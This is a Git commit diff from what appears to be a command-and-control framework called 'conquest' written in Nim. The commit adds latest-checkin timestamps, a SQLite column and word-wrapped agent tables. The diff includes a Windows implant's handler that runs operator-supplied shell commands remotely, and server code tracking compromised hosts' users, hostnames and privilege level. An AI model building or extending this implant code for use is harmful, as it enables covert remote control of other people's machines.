admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implemented displaying latest checkin in agents table, as well as word-wrap.

Browse Source
This commit is contained in:
Jakob Friedl
2025-05-23 13:55:00 +02:00
parent 6f9e20566d
commit 5ab9cd302c
10 changed files with 155 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
agents/monarch/client.nim
View File

@@ -16,7 +16,7 @@ proc main() =
# TODO: Read data from configuration file # TODO: Read data from configuration file
let listener = "NVIACCXB" let listener = "HVVOGEOM"
let agent = register(listener) let agent = register(listener)
echo fmt"[+] [{agent}] Agent registered." echo fmt"[+] [{agent}] Agent registered."

2
agents/monarch/commands/shell.nim
View File

@@ -2,7 +2,7 @@ import winim, osproc, strutils
import ../types import ../types
proc executeShellCommand*(command: seq[string]): TaskResult = proc taskShell*(command: seq[string]): TaskResult =
echo command.join(" ") echo command.join(" ")
let (output, status) = execCmdEx(command.join(" ")) let (output, status) = execCmdEx(command.join(" "))

2
agents/monarch/task.nim
View File

@@ -7,7 +7,7 @@ proc handleTask*(task: Task): Task =
case task.command: case task.command:
of ExecuteShell: of ExecuteShell:
let cmdResult = executeShellCommand(task.args) let cmdResult = taskShell(task.args)
echo cmdResult echo cmdResult
return Task( return Task(

20
server/agent/agent.nim
View File

@@ -1,4 +1,4 @@
import terminal, strformat, strutils, sequtils, tables, json import terminal, strformat, strutils, sequtils, tables, json, times
import ./interact import ./interact
import ../[types, globals, utils] import ../[types, globals, utils]
import ../db/database import ../db/database
@@ -61,8 +61,9 @@ Operating system: {agent.os}
Process name: {agent.process} Process name: {agent.process}
Process ID: {$agent.pid} Process ID: {$agent.pid}
Process elevated: {$agent.elevated} Process elevated: {$agent.elevated}
First checkin: {agent.firstCheckin} First checkin: {agent.firstCheckin.format("dd-MM-yyyy HH:mm:ss")}
""") Latest checkin: {agent.latestCheckin.format("dd-MM-yyyy HH:mm:ss")}
""")
# Terminate agent and remove it from the database # Terminate agent and remove it from the database
proc agentKill*(cq: Conquest, name: string) = proc agentKill*(cq: Conquest, name: string) =
@@ -129,7 +130,9 @@ proc register*(agent: Agent): bool =
return false return false
cq.add(agent) cq.add(agent)
cq.writeLine(fgYellow, styleBright, fmt"[{agent.firstCheckin}] ", resetStyle, "Agent ", fgYellow, styleBright, agent.name, resetStyle, " connected to listener ", fgGreen, styleBright, agent.listener, resetStyle, ": ", fgYellow, styleBright, fmt"{agent.username}@{agent.hostname}", "\n")
let date = agent.firstCheckin.format("dd-MM-yyyy HH:mm:ss")
cq.writeLine(fgYellow, styleBright, fmt"[{date}] ", resetStyle, "Agent ", fgYellow, styleBright, agent.name, resetStyle, " connected to listener ", fgGreen, styleBright, agent.listener, resetStyle, ": ", fgYellow, styleBright, fmt"{agent.username}@{agent.hostname}", "\n")
return true return true
@@ -147,10 +150,13 @@ proc getTasks*(listener, agent: string): JsonNode =
cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agent}.", "\n") cq.writeLine(fgRed, styleBright, fmt"[-] Task-retrieval request made to non-existent agent: {agent}.", "\n")
return nil return nil
# TODO: Update the last check-in date for the accessed agent # Update the last check-in date for the accessed agent
cq.agents[agent.toUpperAscii].latestCheckin = now()
if not cq.dbUpdateCheckin(agent.toUpperAscii, now().format("dd-MM-yyyy HH:mm:ss")):
return nil
let agent = cq.agents[agent] # Return tasks in JSON format
return %agent.tasks.filterIt(it.status != Completed) return %cq.agents[agent.toUpperAscii].tasks.filterIt(it.status != Completed)
proc handleResult*(listener, agent, task: string, taskResult: Task) = proc handleResult*(listener, agent, task: string, taskResult: Task) =

6
server/agent/interact.nim
View File

@@ -56,9 +56,3 @@ proc handleAgentCommand*(cq: Conquest, args: varargs[string]) =
cq.writeLine("") cq.writeLine("")
proc createTask*(args: varargs[string]): Task =
discard
proc addTask*(cq: Conquest, agent: Agent, task: Task) =
discard

3
server/db/database.nim
View File

@@ -33,6 +33,7 @@ proc dbInit*(cq: Conquest) =
sleep INTEGER DEFAULT 10, sleep INTEGER DEFAULT 10,
jitter REAL DEFAULT 0.1, jitter REAL DEFAULT 0.1,
firstCheckin DATETIME NOT NULL, firstCheckin DATETIME NOT NULL,
latestCheckin DATETIME NOT NULL,
FOREIGN KEY (listener) REFERENCES listeners(name) FOREIGN KEY (listener) REFERENCES listeners(name)
); );
@@ -40,5 +41,5 @@ proc dbInit*(cq: Conquest) =
cq.writeLine(fgGreen, "[+] ", cq.dbPath, ": Database created.") cq.writeLine(fgGreen, "[+] ", cq.dbPath, ": Database created.")
conquestDb.close() conquestDb.close()
except SqliteError: except SqliteError as err:
cq.writeLine(fgGreen, "[+] ", cq.dbPath, ": Database file found.") cq.writeLine(fgGreen, "[+] ", cq.dbPath, ": Database file found.")

34
server/db/dbAgent.nim
View File

@@ -1,4 +1,4 @@
import system, terminal, tiny_sqlite import system, terminal, tiny_sqlite, times
import ../types import ../types
#[ #[
@@ -10,9 +10,9 @@ proc dbStoreAgent*(cq: Conquest, agent: Agent): bool =
let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite) let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite)
conquestDb.exec(""" conquestDb.exec("""
INSERT INTO agents (name, listener, process, pid, username, hostname, domain, ip, os, elevated, sleep, jitter, firstCheckin) INSERT INTO agents (name, listener, process, pid, username, hostname, domain, ip, os, elevated, sleep, jitter, firstCheckin, latestCheckin)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?); VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
""", agent.name, agent.listener, agent.process, agent.pid, agent.username, agent.hostname, agent.domain, agent.ip, agent.os, agent.elevated, agent.sleep, agent.jitter, $agent.firstCheckin) """, agent.name, agent.listener, agent.process, agent.pid, agent.username, agent.hostname, agent.domain, agent.ip, agent.os, agent.elevated, agent.sleep, agent.jitter, agent.firstCheckin.format("dd-MM-yyyy HH:mm:ss"), agent.latestCheckin.format("dd-MM-yyyy HH:mm:ss"))
conquestDb.close() conquestDb.close()
except: except:
@@ -28,8 +28,8 @@ proc dbGetAllAgents*(cq: Conquest): seq[Agent] =
try: try:
let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite) let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite)
for row in conquestDb.iterate("SELECT name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin FROM agents;"): for row in conquestDb.iterate("SELECT name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin, latestCheckin FROM agents;"):
let (name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin) = row.unpack((string, string, int, float, string, int, string, string, string, string, string, bool, string)) let (name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin, latestCheckin) = row.unpack((string, string, int, float, string, int, string, string, string, string, string, bool, string, string))
let a = Agent( let a = Agent(
name: name, name: name,
@@ -42,7 +42,8 @@ proc dbGetAllAgents*(cq: Conquest): seq[Agent] =
ip: ip, ip: ip,
os: os, os: os,
elevated: elevated, elevated: elevated,
firstCheckin: firstCheckin, firstCheckin: parse(firstCheckin, "dd-MM-yyyy HH:mm:ss"),
latestCheckin: parse(latestCheckin, "dd-MM-yyyy HH:mm:ss"),
jitter: jitter, jitter: jitter,
process: process process: process
) )
@@ -62,8 +63,8 @@ proc dbGetAllAgentsByListener*(cq: Conquest, listenerName: string): seq[Agent] =
try: try:
let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite) let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite)
for row in conquestDb.iterate("SELECT name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin FROM agents WHERE listener = ?;", listenerName): for row in conquestDb.iterate("SELECT name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin, latestCheckin FROM agents WHERE listener = ?;", listenerName):
let (name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin) = row.unpack((string, string, int, float, string, int, string, string, string, string, string, bool, string)) let (name, listener, sleep, jitter, process, pid, username, hostname, domain, ip, os, elevated, firstCheckin, latestCheckin) = row.unpack((string, string, int, float, string, int, string, string, string, string, string, bool, string, string))
let a = Agent( let a = Agent(
name: name, name: name,
@@ -76,7 +77,8 @@ proc dbGetAllAgentsByListener*(cq: Conquest, listenerName: string): seq[Agent] =
ip: ip, ip: ip,
os: os, os: os,
elevated: elevated, elevated: elevated,
firstCheckin: firstCheckin, firstCheckin: parse(firstCheckin, "dd-MM-yyyy HH:mm:ss"),
latestCheckin: parse(latestCheckin, "dd-MM-yyyy HH:mm:ss"),
jitter: jitter, jitter: jitter,
process: process, process: process,
) )
@@ -110,6 +112,18 @@ proc dbAgentExists*(cq: Conquest, agentName: string): bool =
conquestDb.close() conquestDb.close()
return res.isSome return res.isSome
except:
cq.writeLine(fgRed, styleBright, "[-] ", getCurrentExceptionMsg())
return false
proc dbUpdateCheckin*(cq: Conquest, agentName: string, timestamp: string): bool =
try:
let conquestDb = openDatabase(cq.dbPath, mode=dbReadWrite)
conquestDb.exec("UPDATE agents SET latestCheckin = ? WHERE name = ?", timestamp, agentName)
conquestDb.close()
return true
except: except:
cq.writeLine(fgRed, styleBright, "[-] ", getCurrentExceptionMsg()) cq.writeLine(fgRed, styleBright, "[-] ", getCurrentExceptionMsg())
return false return false

2
server/listener/api.nim
View File

@@ -39,7 +39,7 @@ proc register*(ctx: Context) {.async.} =
agentRegistrationData: AgentRegistrationData = postData.to(AgentRegistrationData) agentRegistrationData: AgentRegistrationData = postData.to(AgentRegistrationData)
agentUuid: string = generate(alphabet=join(toSeq('A'..'Z'), ""), size=8) agentUuid: string = generate(alphabet=join(toSeq('A'..'Z'), ""), size=8)
listenerUuid: string = ctx.getPathParams("listener") listenerUuid: string = ctx.getPathParams("listener")
date: string = now().format("dd-MM-yyyy HH:mm:ss") date: DateTime = now()
let agent: Agent = newAgent(agentUuid, listenerUuid, date, agentRegistrationData) let agent: Agent = newAgent(agentUuid, listenerUuid, date, agentRegistrationData)

9
server/types.nim
View File

@@ -1,6 +1,8 @@
import prompt import prompt
import prologue import prologue
import tables import tables
import times
import terminal
#[ #[
Agent types & procs Agent types & procs
@@ -54,10 +56,10 @@ type
sleep*: int sleep*: int
jitter*: float jitter*: float
tasks*: seq[Task] tasks*: seq[Task]
firstCheckin*: string firstCheckin*: DateTime
lastCheckin*: string latestCheckin*: DateTime
proc newAgent*(name, listener, firstCheckin: string, postData: AgentRegistrationData): Agent = proc newAgent*(name, listener: string, firstCheckin: DateTime, postData: AgentRegistrationData): Agent =
var agent = new Agent var agent = new Agent
agent.name = name agent.name = name
agent.listener = listener agent.listener = listener
@@ -73,6 +75,7 @@ proc newAgent*(name, listener, firstCheckin: string, postData: AgentRegistration
agent.jitter = 0.2 agent.jitter = 0.2
agent.tasks = @[] agent.tasks = @[]
agent.firstCheckin = firstCheckin agent.firstCheckin = firstCheckin
agent.latestCheckin = firstCheckin
return agent return agent

134
server/utils.nim
View File

@@ -1,4 +1,5 @@
import re, strutils, terminal, tables, sequtils import strutils, terminal, tables, sequtils, times, strformat
import std/wordwrap
import ./[types] import ./[types]
@@ -10,6 +11,14 @@ proc validatePort*(portStr: string): bool =
return false return false
# Table border characters # Table border characters
type
Cell = object
text: string
fg: ForegroundColor = fgWhite
bg: BackgroundColor = bgDefault
style: Style
const topLeft = "" const topLeft = ""
const topMid = "" const topMid = ""
const topRight= "" const topRight= ""
@@ -22,67 +31,136 @@ const botRight= "╯"
const hor = "" const hor = ""
const vert = "" const vert = ""
# Wrap cell content
proc wrapCell(text: string, width: int): seq[string] =
result = text.wrapWords(width).splitLines()
# Format border # Format border
proc border(left, mid, right: string, widths: seq[int]): string = proc border(left, mid, right: string, widths: seq[int]): string =
var line = left var line = left
for i, w in widths: for i, w in widths:
line.add(hor.repeat(w)) line.add(hor.repeat(w + 2))
line.add(if i < widths.len - 1: mid else: right) line.add(if i < widths.len - 1: mid else: right)
return line return line
# Format a row of data # Format a row of data
proc row(cells: seq[string], widths: seq[int]): string = proc formatRow(cells: seq[Cell], widths: seq[int]): seq[seq[Cell]] =
var row = vert var wrappedCols: seq[seq[Cell]]
var maxLines = 1
for i, cell in cells: for i, cell in cells:
# Truncate content of a cell with "..." when the value to be inserted is longer than the designated width let wrappedLines = wrapCell(cell.text, widths[i])
let w = widths[i] - 2 wrappedCols.add(wrappedLines.mapIt(Cell(text: it, fg: cell.fg, bg: cell.bg, style: cell.style)))
let c = if cell.len > w: maxLines = max(maxLines, wrappedLines.len)
if w >= 3:
cell[0 ..< w - 3] & "..." for line in 0 ..< maxLines:
else: var lineRow: seq[Cell] = @[]
".".repeat(max(0, w)) for i, col in wrappedCols:
else: let lineText = if line < col.len: col[line].text else: ""
cell let base = cells[i]
row.add(" " & c.alignLeft(w) & " " & vert) lineRow.add(Cell(text: " " & lineText.alignLeft(widths[i]) & " ", fg: base.fg, bg: base.bg, style: base.style))
return row result.add(lineRow)
proc writeRow(cq: Conquest, row: seq[Cell]) =
stdout.write(vert)
for cell in row:
stdout.styledWrite(cell.fg, cell.bg, cell.style, cell.text, resetStyle, vert)
stdout.write("\n")
proc drawTable*(cq: Conquest, listeners: seq[Listener]) = proc drawTable*(cq: Conquest, listeners: seq[Listener]) =
# Column headers and widths # Column headers and widths
let headers = @["Name", "Address", "Port", "Protocol", "Agents"] let headers = @["Name", "Address", "Port", "Protocol", "Agents"]
let widths = @[10, 17, 7, 10, 8] let widths = @[10, 17, 7, 10, 8]
let headerCells = headers.mapIt(Cell(text: it, fg: fgWhite, bg: bgDefault))
cq.writeLine(border(topLeft, topMid, topRight, widths)) cq.writeLine(border(topLeft, topMid, topRight, widths))
cq.writeLine(row(headers, widths)) for line in formatRow(headerCells, widths):
cq.hidePrompt()
cq.writeRow(line)
cq.showPrompt()
cq.writeLine(border(midLeft, midMid, midRight, widths)) cq.writeLine(border(midLeft, midMid, midRight, widths))
for l in listeners: for l in listeners:
# Get number of agents connected to the listener # Get number of agents connected to the listener
let connectedAgents = cq.agents.values.countIt(it.listener == l.name) let connectedAgents = cq.agents.values.countIt(it.listener == l.name)
let row = @[l.name, l.address, $l.port, $l.protocol, $connectedAgents] let rowCells = @[
cq.writeLine(row(row, widths)) Cell(text: l.name, fg: fgGreen),
Cell(text: l.address),
Cell(text: $l.port),
Cell(text: $l.protocol),
Cell(text: $connectedAgents)
]
for line in formatRow(rowCells, widths):
cq.hidePrompt()
cq.writeRow(line)
cq.showPrompt()
cq.writeLine(border(botLeft, botMid, botRight, widths)) cq.writeLine(border(botLeft, botMid, botRight, widths))
# Calculate time since latest checking in format: Xd Xh Xm Xs
proc timeSince*(timestamp: DateTime): Cell =
let
now = now()
duration = now - timestamp
totalSeconds = int(duration.inSeconds)
let
days = totalSeconds div 86400
hours = (totalSeconds mod 86400) div 3600
minutes = (totalSeconds mod 3600) div 60
seconds = totalSeconds mod 60
var text = ""
if days > 0:
text &= fmt"{days}d "
if hours > 0 or days > 0:
text &= fmt"{hours}h "
if minutes > 0 or hours > 0 or days > 0:
text &= fmt"{minutes}m "
text &= fmt"{seconds}s"
return Cell(
text: text.strip(),
# When the agent is 'dead', meaning that the latest checkin occured
# more than 15 seconds ago, dim the text of the cell
style: if totalSeconds > 15: styleDim else: styleBright
)
proc drawTable*(cq: Conquest, agents: seq[Agent]) = proc drawTable*(cq: Conquest, agents: seq[Agent]) =
let headers: seq[string] = @["Name", "Address", "Username", "Hostname", "Operating System", "Process", "PID"] let headers: seq[string] = @["Name", "Address", "Username", "Hostname", "Operating System", "Process", "PID", "Activity"]
let widths = @[10, 17, 20, 20, 20, 15, 7] let widths = @[10, 17, 15, 15, 18, 15, 7, 10]
let headerCells = headers.mapIt(Cell(text: it, fg: fgWhite, bg: bgDefault))
cq.writeLine(border(topLeft, topMid, topRight, widths)) cq.writeLine(border(topLeft, topMid, topRight, widths))
cq.writeLine(row(headers, widths)) for line in formatRow(headerCells, widths):
cq.hidePrompt()
cq.writeRow(line)
cq.showPrompt()
cq.writeLine(border(midLeft, midMid, midRight, widths)) cq.writeLine(border(midLeft, midMid, midRight, widths))
for a in agents: for a in agents:
let row = @[a.name, a.ip, a.username, a.hostname, a.os, a.process, $a.pid]
# Highlight agents running within elevated processes
if a.elevated:
cq.writeLine(bgRed, fgBlack, row(row, widths))
else:
cq.writeLine(row(row, widths))
var cells = @[
Cell(text: a.name, fg: fgYellow, style: styleBright),
Cell(text: a.ip),
Cell(text: a.username),
Cell(text: a.hostname),
Cell(text: a.os),
Cell(text: a.process, fg: if a.elevated: fgRed else: fgWhite),
Cell(text: $a.pid, fg: if a.elevated: fgRed else: fgWhite),
timeSince(a.latestCheckin)
]
# Highlight agents running within elevated processes
for line in formatRow(cells, widths):
cq.hidePrompt()
cq.writeRow(line)
cq.showPrompt()
cq.writeLine(border(botLeft, botMid, botRight, widths)) cq.writeLine(border(botLeft, botMid, botRight, widths))